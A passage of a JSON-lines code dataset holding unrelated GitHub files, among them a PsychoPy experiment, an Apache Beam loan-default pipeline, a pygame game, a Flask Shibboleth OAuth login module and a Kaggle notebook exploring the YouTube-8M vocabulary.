stim_win.flip()\r\n core.wait(stim_interval)\r\n metronome(cvc_slow_rate)\r\n metronome(cvc_faster_rate)\r\n metronome(cvc_faster_rate)\r\n metronome(cvc_faster_rate)\r\n core.wait(stim_interval)\r\n\r\n# Ask participant if they are ready to continue\r\nmessage.setText(sample_goodbye)\r\nready_cont()\r\n\r\n# The real stimuli loop\r\nstim_win.flip()\r\nfor i in range(len(real_stim)):\r\n message.setText(real_stim[i])\r\n stim_win.flip()\r\n core.wait(stim_interval)\r\n metronome(cvc_slow_rate)\r\n metronome(cvc_faster_rate)\r\n metronome(cvc_faster_rate)\r\n metronome(cvc_faster_rate)\r\n core.wait(stim_interval)\r\n\r\n# Saying goodbye\r\nstim_win.flip()\r\nmessage.setText(thank_you)\r\nready_cont()\r\ncore.wait(stim_interval)\r\n\r\n#cleanup\r\nstim_win.close()\r\ncore.quit()\r\n","repo_name":"vivithemage/phonotactic-constraints-presentation-software","sub_path":"training/saf-fis/training-saf-fis-2.py","file_name":"training-saf-fis-2.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19818439090","text":"from typing import List\n\nfrom aitemplate import backend\nfrom aitemplate.backend import registry\nfrom aitemplate.compiler.base import IntImm, IntVar, Operator, Tensor\nfrom aitemplate.compiler.dtype import get_dtype_size\n\n\nclass full(Operator):\n \"\"\"\n Creates a tensor of a given `shape` and `dtype` filled\n with the specified `fill_value` (float scalar).\n\n Args:\n shape (int or IntVar or List[IntVar]): the shape of the output Tensor.\n fill_value (int or float): the value to fill the output Tensor with.\n dtype (str): the dtype of the output Tensor.\n\n Returns:\n Tensor: a tensor of `shape` and `dtype` filled with `fill_value`.\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n\n self._attrs[\"op\"] = \"full\"\n self._attrs[\"has_profiler\"] = False\n\n def __call__(\n self,\n shape: List[IntVar],\n fill_value: float,\n dtype: str = \"float16\",\n ) -> Tensor:\n if isinstance(shape, (int, IntVar)):\n shape = [shape]\n if not isinstance(shape, (list, tuple)):\n raise TypeError(f\"shape must be List[IntVar], but got {shape}.\")\n shape = list(shape)\n static_shape = all([isinstance(s, (int, IntImm)) for s in shape])\n\n if not isinstance(fill_value, (int, float)):\n raise TypeError(f\"fill_value must be a scalar, but got {fill_value}.\")\n fill_value = float(fill_value)\n\n # validation inside\n get_dtype_size(dtype)\n\n self._attrs[\"inputs\"] = []\n self._attrs[\"fill_value\"] = fill_value\n\n self._set_depth()\n output = Tensor(\n shape, src_ops={self}, dtype=dtype, skip_constant_folding=not static_shape\n )\n self._attrs[\"outputs\"] = [output]\n return output\n\n def gen_function(self) -> str:\n target = backend.target.Target.current()\n func_key = f\"{target.name()}.{self._attrs['op']}.gen_function\"\n func = registry.get(func_key)\n return func(self._attrs)\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/compiler/ops/tensor/full.py","file_name":"full.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"3362705722","text":"import apache_beam as beam\n\n\ndef split_row(element):\n return element.split(',')\n\n\ndef remove_spaces(element): # Note: Some columns values start with a space\n element[6] = element[6].replace(\" \", \"\")\n element[8] = element[8].replace(\" \", \"\")\n return element\n\n\ndef filter_medical_loans(element):\n return element[5] == \"Medical Loan\"\n\n\ndef add_points_column(element): # penalty points\n element.append(0) # default value for no. of late_payments\n return element\n\n\ndef late_payments(element):\n if element[8] > element[6]:\n element[9] += 1 # 1 point for each penalty\n return element\n\n\ndef get_select_elements(record):\n selected_elements = (record[0], record[9]) # convert to tuple, in order to do GroupBy later\n return selected_elements\n\n\nclass Counting(beam.DoFn):\n\n def process(self, element):\n (key, values) = element\n return [(key, sum(values))]\n\n\ndef filter_defaulters(element): # 3 or more late payments\n (key, n_late_payments) = element\n return element[1] >= 3\n\n\np1 = beam.Pipeline()\n\nmed_loan_defaulters = (\n p1\n | beam.io.ReadFromText('loan.txt',\n skip_header_lines=1)\n | beam.Map(split_row)\n # | beam.Map(print)\n | beam.Map(remove_spaces)\n # | beam.Map(print)\n | beam.Filter(filter_medical_loans)\n # | beam.Map(print)\n | beam.Map(add_points_column)\n | beam.Map(late_payments)\n # | beam.Map(print)\n | beam.Map(get_select_elements) # ('CT55975', 1), ('CT55975', 0)\n # | beam.Map(print)\n | beam.GroupByKey() # ('CT55975', [0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0])\n | beam.ParDo(Counting()) # ('CT55975', 5)\n | beam.Filter(filter_defaulters)\n | beam.Map(print)\n )\n\np1.run()\n","repo_name":"the-data-guy/Apache_Beam-GCP_Dataflow","sub_path":"Garg/Bank_Defaulters/medical_loans.py","file_name":"medical_loans.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27346745826","text":"import pygame\nfrom components import ui\nfrom components.defaults import Screens, GO_TO_MAINMENU, GO_TO_INSTRUCTION, PLAY, PAUSE, MB_YESNO, ICON_INFO, IN_GAME_BGM, MAINMENU_BGM\nimport ctypes\n\npygame.display.init()\npygame.mixer.init()\n\n\ndisp = pygame.display.set_mode(size=(860, 476), flags=pygame.SHOWN)\nclock = pygame.time.Clock()\n\n# Components\nmainMenu = ui.MainMenu()\ninstructionScreen = ui.Instruction()\ncurrentScreen = Screens.MAIN_MENU\ngameplay = ui.Game()\n#\n\npygame.mixer.music.load(MAINMENU_BGM)\npygame.mixer.music.play(fade_ms=350)\nrunning = True\nwhile running:\n if (currentScreen == Screens.MAIN_MENU):\n mainMenu.update(1/20)\n mainMenu.render(disp)\n elif (currentScreen == Screens.INSTRUCTION):\n instructionScreen.update()\n instructionScreen.render(disp)\n elif (currentScreen == Screens.PLAY):\n gameplay.update()\n gameplay.render(disp)\n \n for e in pygame.event.get():\n if (e.type == pygame.QUIT):\n exit(0)\n elif (e.type == GO_TO_INSTRUCTION.type):\n currentScreen = Screens.INSTRUCTION\n elif (e.type == PLAY.type):\n pygame.mixer.music.stop()\n pygame.mixer.music.unload()\n pygame.mixer.music.load(IN_GAME_BGM)\n pygame.mixer.music.play(fade_ms=350)\n currentScreen = Screens.PLAY\n gameplay = ui.Game()\n elif (e.type == GO_TO_MAINMENU.type):\n pygame.mixer.music.stop()\n pygame.mixer.music.unload()\n pygame.mixer.music.load(MAINMENU_BGM)\n pygame.mixer.music.play(fade_ms=350)\n instructionScreen = ui.Instruction()\n mainMenu = ui.MainMenu()\n currentScreen = Screens.MAIN_MENU\n elif (e.type == PAUSE.type):\n if (ctypes.windll.user32.MessageBoxW(0, \"Do you want to continue playing?\\nClick 'Yes' to resume.\\nClick 'No' to exit.\", \"Game paused\", MB_YESNO | ICON_INFO) == 7):\n instructionScreen = ui.Instruction()\n gameplay = ui.Game()\n mainMenu = ui.MainMenu()\n currentScreen = Screens.MAIN_MENU\n\n pygame.display.flip()\n clock.tick(120)","repo_name":"nhathuy07/CatchThePrimes_Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24652043707","text":"class Solution:\n def moveZeroes(self, arr: List[int]) -> None:\n i = 0\n j = 0\n while j < len(arr):\n if arr[j] != 0:\n arr[i],arr[j] = arr[j],arr[i]\n i += 1\n j += 1\n\n\n# [0 1 1 0 2 2 3 3] becomes [1 1 2 2 3 3 0 0 0] ","repo_name":"sanjeevjayasurya/leetCodeProblems","sub_path":"move_zeroes_to_right.py","file_name":"move_zeroes_to_right.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19892465194","text":"from lib.playsound import playsound\nimport threading\nfrom time import sleep\n\n\nclass SoundGlobal():\n global allow_sound\n\nclass SoundCaller:\n path : str\n duration : float\n def __init__(self,path):\n self.path = path\n if(SoundGlobal().allow_sound == True):\n self.CreateSoundThread()\n\n # Creates a sound thread for calling a sound effect\n def CreateSoundThread(self):\n path = self.path\n sound_thread = threading.Thread(target=self.SoundThread,args=(path, ))\n sound_thread.start()\n\n # Calls the specified sound\n def SoundThread(self,path):\n self.duration=playsound(f'{path}',False)\n if(self.duration==0):\n print(\"Sound duration is not supported in this system!\")\n\n","repo_name":"Arda-Gokalp-Batmaz-AGB/Tetris2048","sub_path":"SoundCaller.py","file_name":"SoundCaller.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30591138623","text":"# import required libraries\nfrom vidgear.gears.stabilizer import Stabilizer\nimport cv2\n\n# Open suitable video stream, such as webcam on first index(i.e. 0)\nstream = cv2.VideoCapture(r'D:\\Pesa\\Video\\test\\U.mp4')\n\nsize = (int(stream.get(3)),int(stream.get(4)))\nresult = cv2.VideoWriter(\"Stabili_vidgear.mp4\", \n cv2.VideoWriter_fourcc(*'MP4V'),\n 30, size)\n\n\n\n\n# initiate stabilizer object with default parameters\nstab = Stabilizer()\n\n# loop over\nwhile True:\n\n # read frames from stream\n (grabbed, frame) = stream.read()\n \n \n\n # check for frame if not grabbed\n if not grabbed:\n break\n\n # send current frame to stabilizer for processing\n stabilized_frame = stab.stabilize(frame)\n \n\n # wait for stabilizer which still be initializing\n if stabilized_frame is None:\n continue\n\n # {do something with the stabilized frame here}\n\n # Show output window\n result.write(stabilized_frame)\n cv2.imshow(\"Stabilized Frame\", stabilized_frame)\n\n # check for 'q' key if pressed\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n\nresult.release()\n# close output window\ncv2.destroyAllWindows()\n\n# clear stabilizer resources\nstab.clean()\n\n# safely close video stream\nstream.release()","repo_name":"AmarinNon/YSC_Project","sub_path":"Pesa/stabilize_vidGear.py","file_name":"stabilize_vidGear.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41624092874","text":"'''\n9. Escribir una función que tome una lista de nombres y los una en una sola\ncadena separada por un salto de línea, por ejemplo: [\"Juan\", \"María\", \"Pedro\"]\n-> \"Juan\\nMaría\\nPedro\"\n'''\n\nlista_de_nombres = [\"Juan\", \"María\", \"Pedro\"]\nseparador = \"\\n\"\n\ndef de_lista_a_cadena_con_separador(lista : list, separador : str)-> str:\n '''\n crea una cadena desde una lista de nombres con un separador entre ellos\n recibe una lista de nombres, y un separador (\"ejemplo \"\\n\" , \"-\" , \" \")\n devuelve una cadena\n '''\n cadena = separador.join(lista)\n return cadena\n\nprint(de_lista_a_cadena_con_separador(lista_de_nombres, separador))","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"7-Ejercicios-Metodos_cadena-GUIA-f/9_Ejercicio_strings_de_lista_a_cadena_con_separador.py","file_name":"9_Ejercicio_strings_de_lista_a_cadena_con_separador.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8971700040","text":"address = [\"becky street\", 7800, \"japan\"]\npins = {\"mark\": 1234, \"joe\": 1111, \"alice\": 4567}\n\nprint(address[0], address[1])\n# print(len(address))\n# print(type(address[1]))\n# print(address[0:2]) slicing is upper bound exclusive\n# print(address[-2])\n\n# address.append(\"usa\")\n# address.remove(\"usa\")\n# print(address)\n# print(dir(address))\n# print(\"Python is fun\"[-3:][-1])\n\n# person = {\"name\": \"jack\", \"surname\": \"smith\", \"age\": \"29\"}\n# person.pop(\"name\")\n# person[\"name\"] = \"hello\"\n# person[\"age\"] = 90\n# print(person)\n\n# keys = [\"a\", \"b\", \"c\"]\n# values = [1, 2, 3]\n# mydirct = dict(zip(keys, values))\n# print(mydirct)\n\npin = int(input(\"enter your pin\"))\n\ndef find_in_file(f):\n myfile = open(\"sample.txt\")\n fruit = myfile.read()\n myfile.close()\n fruit = fruit.splitlines()\n if f in fruit:\n return \"that fruit is in the list\"\n else:\n return \"so such thing\"\n\n\nif pin in pins.values():\n fruit = input(\"enter fruit\")\n print(find_in_file(fruit))\nelse:\n print(\"incorrect pin\")\n print(\"this can be accessed by only: \")\n for key in pins.keys():\n print(key)\n\n\n\n","repo_name":"JYSW380/python3","sub_path":"fundamental/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"933350688","text":"import os\n\nfrom PyQt5.uic import loadUiType\nfrom PyQt5.QtWidgets import QDialog, QFileDialog\n\nsave_form = loadUiType(\"./GUI/SaveGui.ui\")[0]\n\nclass SaveDialog(QDialog, save_form):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.setWindowTitle('Look Out Your Windows')\n \n self.save_path = None\n if os.path.exists(\"./LookOutYourWindows_SavePath.txt\"):\n with open(\"./LookOutYourWindows_SavePath.txt\", \"r\") as f:\n self.save_path = f.readline()\n\n if self.save_path: \n self.lineedit_savepath.setText(self.save_path)\n self.chkbox_save.toggle() # Set check box on\n\n self.btn_browse.clicked.connect(self.browse_dir)\n self.btn_ok.clicked.connect(self.ok)\n self.btn_cancel.clicked.connect(self.cancel)\n\n # Browse save directory\n def browse_dir(self):\n save_path = QFileDialog.getExistingDirectory(self, 'Open a Folder', './') # Must be not self.save path\n self.lineedit_savepath.setText(save_path) # to press 'cancel' returns None\n\n # Click OK btn\n def ok(self):\n self.save_path = self.lineedit_savepath.text()\n\n if self.chkbox_save.isChecked():\n if self.save_path:\n with open(\"./LookOutYourWindows_SavePath.txt\", \"w\") as f:\n f.write(self.save_path)\n else:\n if os.path.exists(\"./LookOutYourWindows_SavePath.txt\"):\n os.remove(\"./LookOutYourWindows_SavePath.txt\")\n\n self.accept()\n\n def cancel(self):\n self.close()","repo_name":"LookOutYourWindows/user-interface","sub_path":"components/SaveDialog.py","file_name":"SaveDialog.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31509784448","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the serviceLane function below.\ndef serviceLane(n, cases):\n all_mins = []\n for i in cases:\n least = width[i[0]]\n for j in range(i[0],i[1]+1):\n if least > width[j]:\n least = width[j]\n all_mins.append(least)\n return all_mins\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n nt = input().split()\n\n n = int(nt[0])\n\n t = int(nt[1])\n\n width = list(map(int, input().rstrip().split()))\n\n cases = []\n\n for _ in range(t):\n cases.append(list(map(int, input().rstrip().split())))\n\n result = serviceLane(n, cases)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"needl3/HackerrankSolutions","sub_path":"Easy/ServiceLane.py","file_name":"ServiceLane.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2801332355","text":"import Nine_Robot\r\n\r\n'''\r\nIntroduction by OrangeSun:\r\n\r\n[List]Board: The Chess Board. Player record as 1, Robot record as 2\r\n[Function]Game: [Click_Button] → [Game_Function] → [Robot_run] → [Return States]\r\n[Function]GameOver: Clear the Chess Board\r\n[Function]Win: Judge Win or Lose, Return a Boolean and a number 0(null) or 1(Player) or 2(Robot)\r\n'''\r\n\r\nBoard = [0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\n\r\ndef game(player):\r\n\t# if invalid event #\r\n\tif Board[player-1] != 0:\r\n\t\treturn '!!!Error : Invalid Event', -1\r\n\r\n\t# else, change the board #\r\n\tBoard[player-1] = 1\r\n\r\n\t# if win or lose, return #\r\n\twins, win_n = win()\r\n\tif wins:\r\n\t\ted = game_over(win_n)\r\n\t\treturn ed, -1\r\n\r\n\t# Robot run #\r\n\ty = Nine_Robot.robot_main(Board)\r\n\tif Board[y] != 0:\r\n\t\tprint('Robot’s Choice is Error !', y)\r\n\tprint(y)\r\n\tBoard[y] = 2\r\n\t# if win or lose, return #\r\n\twins, win_n = win()\r\n\tif wins:\r\n\t\ted = game_over(win_n)\r\n\t\treturn ed, y+1\r\n\treturn '--- Continue ---', y+1\r\n\r\n\r\n# if game over, this function will run #\r\ndef game_over(n):\r\n\t# Clear the Board\r\n\tfor i in range(9):\r\n\t\tBoard[i] = 0\r\n\r\n\t# Return States\r\n\tif n == 1:\r\n\t\treturn '--- You Winner ---'\r\n\telif n == 2:\r\n\t\treturn '--- You Loser ---'\r\n\telif n == 0:\r\n\t\treturn '--- Bad Game ---'\r\n\telse:\r\n\t\treturn '!!! judge error !!!'\r\n\r\n\r\ndef win():\r\n\t# Win or Lose or Continue\r\n\tif (Board[0] == Board[1] == Board[2]) or (Board[0] == Board[3] == Board[6]) or (Board[0] == Board[4] == Board[8]):\r\n\t\tif Board[0] != 0:\r\n\t\t\treturn True, Board[0]\r\n\r\n\tif (Board[6] == Board[4] == Board[2]) or (Board[6] == Board[7] == Board[8]):\r\n\t\tif Board[6] != 0:\r\n\t\t\treturn True, Board[6]\r\n\r\n\tif (Board[5] == Board[4] == Board[3]) or (Board[5] == Board[2] == Board[8]):\r\n\t\tif Board[5] != 0:\r\n\t\t\treturn True, Board[5]\r\n\r\n\tif Board[1] == Board[4] == Board[7]:\r\n\t\tif Board[1] != 0:\r\n\t\t\treturn True, Board[1]\r\n\r\n\tfor i in range(9):\r\n\t\tif Board[i] == 0:\r\n\t\t\treturn False, 0\r\n\treturn True, 0\r\n","repo_name":"OrangeSun/Python-Nine-Chess-AI","sub_path":"Nine_Game.py","file_name":"Nine_Game.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6372888347","text":"from flask import flash, redirect, url_for, jsonify, current_app as app\nfrom flask_security import current_user, login_user, login_required, logout_user, roles_required\nfrom oauthlib.oauth2.rfc6749.errors import InvalidClientIdError, TokenExpiredError\nfrom flask_dance.consumer import OAuth2ConsumerBlueprint, oauth_authorized, oauth_error\nfrom flask_dance.consumer.storage.sqla import SQLAlchemyStorage\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom .models import OAuth, User, Role\nfrom application import auth_db\nfrom application import logger\n\n\nshibboleth = OAuth2ConsumerBlueprint(\n 'shibboleth', __name__,\n client_id=app.config.get('CLIENT_ID'),\n client_secret=app.config.get('CLIENT_SECRET'),\n base_url=app.config.get('BASE_URL'),\n token_url=app.config.get('TOKEN_URL'),\n authorization_url=app.config.get('AUTHORIZATION_URL'),\n authorized_url=app.config.get('AUTHORIZED_URL'),\n scope=app.config.get('SCOPE'),\n storage=SQLAlchemyStorage(OAuth, auth_db.session, user=current_user)\n)\n\n\ndef is_admin(username):\n admins = app.config.get('ADMINS')\n return True if username in admins else False\n\n\n@shibboleth.before_app_first_request\ndef before_first_request():\n # Admin role check/create\n admin_role_query = Role.query.filter_by(name='admin')\n try:\n admin_role = admin_role_query.one()\n except NoResultFound:\n admin_role = Role(name='admin', description='Administrator')\n auth_db.session.add(admin_role)\n auth_db.session.commit()\n\n # End user role check/create\n end_user_role_query = Role.query.filter_by(name='end-user')\n try:\n end_user_role = end_user_role_query.one()\n except NoResultFound:\n end_user_role = Role(name='end-user', description='End user')\n auth_db.session.add(end_user_role)\n auth_db.session.commit()\n\n\n# Create/login local user on successful OAuth login\n@oauth_authorized.connect_via(shibboleth)\ndef shibboleth_logged_in(shibboleth, token):\n\n if not token:\n flash('Failed to log in.', category='error')\n return False\n\n resp = shibboleth.session.get('/idp/profile/oidc/userinfo')\n if not resp.ok:\n msg = 'Failed to fetch user info.'\n flash(msg, category='error')\n return False\n\n info = resp.json()\n user_id = info['preferred_username']\n\n # Find this OAuth token in the database, or create it\n query = OAuth.query.filter_by(provider=shibboleth.name, provider_user_id=user_id)\n try:\n oauth = query.one()\n except NoResultFound:\n oauth = OAuth(provider=shibboleth.name, provider_user_id=user_id, token=token)\n\n if oauth.user:\n login_user(oauth.user)\n flash('Successfully signed in.')\n\n else:\n # Create a new local user account for this user\n user = User(email=info['email'],\n uniqname=info['preferred_username'],\n first_name=info['given_name'],\n last_name=info['family_name'],\n active=True)\n # Add end-user role.\n user.roles.append(Role.query.filter_by(name='end-user').one())\n\n # Admin role check\n if is_admin(user_id):\n user.roles.append(Role.query.filter_by(name='admin').one())\n\n auth_db.session.add(user)\n auth_db.session.commit()\n\n # Associate the new local user account with the OAuth token\n oauth.user = user\n # Save and commit our database models\n auth_db.session.add_all([user, oauth])\n auth_db.session.commit()\n # Log in the new local user account\n login_user(user)\n flash('Successfully signed in.')\n\n # Disable Flask-Dance's default behavior for saving the OAuth token\n return False\n\n\n# Login\n@shibboleth.route(\"/login\")\ndef auth():\n return redirect(url_for(\"shibboleth.login\"))\n\n\n# Logout\n@shibboleth.route(\"/logout\", methods=['GET'])\ndef logout():\n\n if not shibboleth.authorized:\n logger.info(\"not logged in\")\n return redirect(url_for('routes_bp.index'))\n\n try:\n resp = shibboleth.session.post(\n app.config.get('REVOKE_URL'),\n params={'token': app.blueprints['shibboleth'].session.token[\"access_token\"]},\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}\n )\n if resp.ok:\n del app.blueprints['shibboleth'].token\n auth_db.session.clear()\n logout_user()\n return redirect(url_for('routes_bp.index'))\n\n except TokenExpiredError as e:\n logger.info(\"Token expired\")\n logout_user()\n return redirect(url_for('routes_bp.index'))\n\n\n# Retrieve current user info\n@shibboleth.route(\"/getuser\")\ndef get_user():\n\n if not shibboleth.authorized:\n logger.info(\"not logged in\")\n return redirect(url_for('routes_bp.index'))\n\n return jsonify(first_name=current_user.first_name,\n email=current_user.email,\n authenticated=True,\n admin=is_admin(current_user.uniqname))\n\n\n# notify on OAuth provider error\n@oauth_error.connect_via(shibboleth)\ndef shibboleth_error(shibboleth, message, response):\n msg = 'OAuth error from {name}! message={message} response={response}'.format(\n name=shibboleth.name, message=message, response=response\n )\n flash(msg, category='error')\n","repo_name":"GhastlyParadox/Flora-Flask","sub_path":"application/auth/shibboleth.py","file_name":"shibboleth.py","file_ext":"py","file_size_in_byte":5330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24143176343","text":"from .BaseLayer import BaseLayer\nfrom .Activation import Activation\nfrom simplegrad import Graph\nfrom simplegrad.implementation.primitives.Variable import Variable\nimport numpy as np\n\n\nclass DenseLayer(BaseLayer):\n def __init__(self, num_neurons: int, activation: str | Activation = \"relu\"):\n self._num_neurons = num_neurons\n self._bias = Variable(np.zeros((1, num_neurons)))\n if isinstance(activation, str):\n self._activation = Activation(activation)\n else:\n self._activation = activation\n self._num_neurons = num_neurons\n self._graph = None\n self._shape = None\n self._features = None\n self._weight = None\n\n def setInput(self, input: Graph):\n self._features = input.shape[1]\n assert len(input.shape) == 2, \"Expected input shape to be (n, features)\"\n if self._weight is None:\n self._weight = Variable(\n np.random.random((self._features, self._num_neurons)) * 2 - 1\n )\n\n self._shape = (input.shape[0], self._num_neurons)\n self._graph = input @ self._weight + self._bias\n if self._activation is not None:\n self._graph = self._activation(self._graph)\n\n def getTrainable(self) -> list[Variable]:\n return [self._weight, self._bias]\n\n def getGraph(self) -> Graph:\n assert self._graph is not None, \"Must call setInput() at first\"\n return self._graph\n\n def __call__(self, *args, **kwargs):\n self.setInput(*args, **kwargs)\n return self.getGraph()\n\n @property\n def shape(self):\n return self._shape\n","repo_name":"alexdremov/SimpleGrad","sub_path":"simplegrad/algo/nn/DenseLayer.py","file_name":"DenseLayer.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10146439175","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nimport networkx as nx\nfrom subprocess import check_output\nfrom wordcloud import WordCloud, STOPWORDS\n\n# In[ ]:\n\n\nvocabulary = pd.read_csv('../input/vocabulary.csv')\nvocabulary.head()\n\n# In[ ]:\n\n\nvocabulary.describe()\n\n# In[ ]:\n\n\nvocabulary.info()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical1').TrainVideoCount.sum().plot(kind=\"bar\")\nplt.title(\"Average TrainVideoCount per vertical1\")\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical1').Index.count().plot(kind=\"bar\")\nplt.title(\"Average number video per vertical1\")\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical2').TrainVideoCount.sum().plot(kind=\"bar\")\nplt.title(\"Average TrainVideoCount per vertical2\")\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical2').TrainVideoCount.count().plot(kind=\"bar\")\nplt.title(\"Average video number per vertical2\")\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical3').TrainVideoCount.sum().plot(kind=\"bar\")\nplt.title(\"Average TrainVideoCount per vertical3\")\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical2').TrainVideoCount.count().plot(kind=\"bar\")\nplt.title(\"Average video number per vertical3\")\nplt.show()\n\n# In[ ]:\n\n\nsns.lmplot(x='Index', y='TrainVideoCount', data=vocabulary , size=15)\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nsns.heatmap(vocabulary.groupby('Vertical1').corr(), annot=True )\nplt.show()\n\n# In[ ]:\n\n\nvocabulary.groupby('Vertical1').corr()\n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\n\nstopwords = set(STOPWORDS)\n\nwordcloud = WordCloud(\n background_color='black',\n stopwords=stopwords,\n max_words=1000,\n max_font_size=120, \n random_state=42\n ).generate(str(vocabulary['WikiDescription']))\n\nprint(wordcloud)\nfig = plt.figure(1)\nplt.imshow(wordcloud)\nplt.title(\"WORD CLOUD - description\")\nplt.axis('off')\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\n\nstopwords = set(STOPWORDS)\n\nwordcloud = WordCloud(\n background_color='black',\n stopwords=stopwords,\n max_words=1000,\n max_font_size=120, \n random_state=42\n ).generate(str(vocabulary['Name']))\n\nprint(wordcloud)\nfig = plt.figure(1)\nplt.imshow(wordcloud)\nplt.title(\"WORD CLOUD - Name\")\nplt.axis('off')\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\n\nstopwords = set(STOPWORDS)\n\nwordcloud = WordCloud(\n background_color='black',\n stopwords=stopwords,\n max_words=1000,\n max_font_size=120, \n random_state=42\n ).generate(str(vocabulary['Vertical1']))\n\nprint(wordcloud)\nfig = plt.figure(1)\nplt.imshow(wordcloud)\nplt.title(\"WORD CLOUD - Vertical1\")\nplt.axis('off')\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\n\nstopwords = set(STOPWORDS)\n\nwordcloud = WordCloud(\n background_color='black',\n stopwords=stopwords,\n max_words=1000,\n max_font_size=120, \n random_state=42\n ).generate(str(vocabulary['Vertical2']))\n\nprint(wordcloud)\nfig = plt.figure(1)\nplt.imshow(wordcloud)\nplt.title(\"WORD CLOUD - Vertical2\")\nplt.axis('off')\nplt.show()\n\n# In[ ]:\n\n\nwith open('../input/vocabulary.csv', 'r') as f:\n vocabularylist = list(csv.reader(f))\nT1=[]\nfor l in vocabularylist:\n if l[5] != 'NaN' and l[6] !='NaN' and l[5] != '' and l[6] !='' and l[5] != l[6] :\n c1 = l[5]\n c2 = l[6]\n tuple = (c1, c2)\n if l[5] != 'NaN' and l[7] !='NaN' and l[5] != '' and l[7] !='' and l[5] != l[7] :\n c1 = l[5]\n c2 = l[7]\n tuple = (c1, c2)\n if l[6] != 'NaN' and l[7] !='NaN' and l[6] != '' and l[7] !='' and l[7] != l[6] :\n c1 = l[6]\n c2 = l[7]\n tuple = (c1, c2)\n T1.append(tuple)\nedges = {k: T1.count(k) for k in set(T1)}\nedges\n \n\n# In[ ]:\n\n\nB = nx.DiGraph()\nnodecolor=[]\nfor ed, weight in edges.items():\n if ed[0]!='Vertical2' and ed[0]!='Vertical3' and ed[1]!='Vertical2' and ed[1]!='Vertical3':\n B.add_edge(ed[0], ed[1], weight=weight)\nfor k in B.nodes:\n if (k == \"Beauty & Fitness\"):\n nodecolor.append('blue')\n elif (k == \"News\"):\n nodecolor.append('Magenta')\n elif (k == \"Food & Drink\"):\n nodecolor.append('crimson')\n elif (k == \"Health\"):\n nodecolor.append('green')\n elif (k == \"Science\"):\n nodecolor.append('yellow')\n elif (k == \"Business & Industrial\"):\n nodecolor.append('cyan')\n elif (k == \"Home & Garden\"):\n nodecolor.append('darkorange')\n elif (k == \"Travel\"):\n nodecolor.append('slategrey')\n elif (k == \"Arts & Entertainment\"):\n nodecolor.append('red')\n elif (k == \"Games\"):\n nodecolor.append('grey')\n elif (k == \"People & Society\"):\n nodecolor.append('lightcoral')\n elif (k == \"Shopping\"):\n nodecolor.append('maroon')\n elif (k ==\"Computers & Electronics\"):\n nodecolor.append('orangered')\n elif (k == \"Hobbies & Leisure\"):\n nodecolor.append('saddlebrown')\n elif (k == \"Sports\"):\n nodecolor.append('lawngreen')\n elif (k == \"Real 